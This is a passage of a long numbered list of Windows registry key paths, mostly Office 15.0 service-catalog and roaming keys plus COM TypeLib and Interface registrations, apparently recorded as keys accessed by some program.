1381. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\DefaultFolderRelativePath",
1382. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\KeyTip",
1383. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\Type",
1384. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails",
1385. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url16x16",
1386. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url32x32",
1387. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url48x48",
1388. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP",
1389. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Capabilities",
1390. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ConnectMechanism",
1391. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\IsManaged",
1392. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\IsRemovable",
1393. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceOwner",
1394. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\SortOrder",
1395. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\SupportsMultiple",
1396. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\CapabilitiesMetadata",
1397. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Description",
1398. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Name",
1399. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceId",
1400. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceUrl",
1401. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata",
1402. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata\\KeyTip",
1403. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata\\Type",
1404. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails",
1405. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
1406. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
1407. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
1408. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER",
1409. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Capabilities",
1410. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ConnectMechanism",
1411. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\IsManaged",
1412. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\IsRemovable",
1413. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceOwner",
1414. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\SortOrder",
1415. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\SupportsMultiple",
1416. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\CapabilitiesMetadata",
1417. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Description",
1418. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Name",
1419. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceId",
1420. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceUrl",
1421. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata",
1422. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\HideIfEmpty",
1423. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\KeyTip",
1424. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\Type",
1425. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails",
1426. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url16x16",
1427. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url32x32",
1428. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url48x48",
1429. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE",
1430. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Capabilities",
1431. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ConnectMechanism",
1432. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\IsManaged",
1433. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\IsRemovable",
1434. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceOwner",
1435. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\SortOrder",
1436. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\SupportsMultiple",
1437. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\CapabilitiesMetadata",
1438. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Description",
1439. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Name",
1440. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceId",
1441. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceUrl",
1442. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata",
1443. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\DefaultCreateRelativePath",
1444. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\DefaultFolderRelativePath",
1445. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\KeyTip",
1446. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\RegularExpression",
1447. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\Type",
1448. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails",
1449. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url16x16",
1450. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url32x32",
1451. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url48x48",
1452. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT",
1453. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Capabilities",
1454. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ConnectMechanism",
1455. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\IsManaged",
1456. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\IsRemovable",
1457. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceOwner",
1458. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\SortOrder",
1459. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\SupportsMultiple",
1460. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Description",
1461. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Name",
1462. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceId",
1463. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceUrl",
1464. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails",
1465. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url16x16",
1466. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url32x32",
1467. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url48x48",
1468. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE",
1469. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Capabilities",
1470. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ConnectMechanism",
1471. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\IsManaged",
1472. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\IsRemovable",
1473. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceOwner",
1474. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\SortOrder",
1475. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\SupportsMultiple",
1476. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Description",
1477. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Name",
1478. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceId",
1479. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceUrl",
1480. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails",
1481. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url16x16",
1482. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url32x32",
1483. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url48x48",
1484. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE",
1485. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Capabilities",
1486. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ConnectMechanism",
1487. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\IsManaged",
1488. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\IsRemovable",
1489. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceOwner",
1490. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\SortOrder",
1491. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\SupportsMultiple",
1492. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\CapabilitiesMetadata",
1493. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Description",
1494. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Name",
1495. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceId",
1496. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceUrl",
1497. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata",
1498. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\DefaultCreateRelativePath",
1499. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\DefaultFolderRelativePath",
1500. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\KeyTip",
1501. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\RegularExpression",
1502. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\Type",
1503. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails",
1504. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url16x16",
1505. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url32x32",
1506. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url48x48",
1507. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingConfigurableSettings",
1508. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastSyncTime",
1509. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastWriteTime",
1510. "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib\\AEF39C5E-0E77-4CEB-A5FC-E4AD383E5675",
1511. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\AEF39C5E-0E77-4CEB-A5FC-E4AD383E5675\\2.0",
1512. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\AEF39C5E-0E77-4CEB-A5FC-E4AD383E5675\\2.0\\(Default)",
1513. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\AEF39C5E-0E77-4CEB-A5FC-E4AD383E5675\\2.0\\FLAGS",
1514. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\AEF39C5E-0E77-4CEB-A5FC-E4AD383E5675\\2.0\\FLAGS\\(Default)",
1515. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\AEF39C5E-0E77-4CEB-A5FC-E4AD383E5675\\2.0\\0",
1516. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\AEF39C5E-0E77-4CEB-A5FC-E4AD383E5675\\2.0\\0\\win32",
1517. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\AEF39C5E-0E77-4CEB-A5FC-E4AD383E5675\\2.0\\0\\win32\\(Default)",
1518. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\AEF39C5E-0E77-4CEB-A5FC-E4AD383E5675\\2.0\\HELPDIR",
1519. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\AEF39C5E-0E77-4CEB-A5FC-E4AD383E5675\\2.0\\HELPDIR\\(Default)",
1520. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\BEF6E003-A874-101A-8BBA-00AA00300CAB\\(Default)",
1521. "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib\\AEF39C5E-0E77-4CEB-A5FC-E4AD383E5675\\2.0",
1522. "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib\\AEF39C5E-0E77-4CEB-A5FC-E4AD383E5675\\2.0\\(Default)",
1523. "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib\\AEF39C5E-0E77-4CEB-A5FC-E4AD383E5675\\2.0\\FLAGS",
1524. "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib\\AEF39C5E-0E77-4CEB-A5FC-E4AD383E5675\\2.0\\FLAGS\\(Default)",
1525. "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib\\AEF39C5E-0E77-4CEB-A5FC-E4AD383E5675\\2.0\\0",
1526. "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib\\AEF39C5E-0E77-4CEB-A5FC-E4AD383E5675\\2.0\\0\\win32",
1527. "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib\\AEF39C5E-0E77-4CEB-A5FC-E4AD383E5675\\2.0\\0\\win32\\(Default)",
1528. "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib\\AEF39C5E-0E77-4CEB-A5FC-E4AD383E5675\\2.0\\HELPDIR",
1529. "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib\\AEF39C5E-0E77-4CEB-A5FC-E4AD383E5675\\2.0\\HELPDIR\\(Default)",
1530. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\BEF6E003-A874-101A-8BBA-00AA00300CAB",
1531. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\BEF6E003-A874-101A-8BBA-00AA00300CAB\\(Default)",
1532. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\BEF6E003-A874-101A-8BBA-00AA00300CAB",
1533. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\BEF6E003-A874-101A-8BBA-00AA00300CAB\\(Default)",
1534. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\EC72F590-F375-11CE-B9E8-00AA006B1A69",
1535. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\EC72F590-F375-11CE-B9E8-00AA006B1A69\\(Default)",
1536. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\EC72F590-F375-11CE-B9E8-00AA006B1A69",
1537. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\EC72F590-F375-11CE-B9E8-00AA006B1A69\\(Default)",
1538. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\82B02370-B5BC-11CF-810F-00A0C9030074",
1539. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\82B02370-B5BC-11CF-810F-00A0C9030074\\(Default)",
1540. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\82B02370-B5BC-11CF-810F-00A0C9030074",
1541. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\82B02370-B5BC-11CF-810F-00A0C9030074\\(Default)",
1542. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\82B02371-B5BC-11CF-810F-00A0C9030074",
1543. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\82B02371-B5BC-11CF-810F-00A0C9030074\\(Default)",
1544. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\82B02371-B5BC-11CF-810F-00A0C9030074",
1545. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\82B02371-B5BC-11CF-810F-00A0C9030074\\(Default)",
1546. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\82B02372-B5BC-11CF-810F-00A0C9030074",
1547. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\82B02372-B5BC-11CF-810F-00A0C9030074\\(Default)",
1548. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\82B02372-B5BC-11CF-810F-00A0C9030074",
1549. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\82B02372-B5BC-11CF-810F-00A0C9030074\\(Default)",
1550. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8A683C90-BA84-11CF-8110-00A0C9030074",
1551. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8A683C90-BA84-11CF-8110-00A0C9030074\\(Default)",
1552. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8A683C90-BA84-11CF-8110-00A0C9030074",
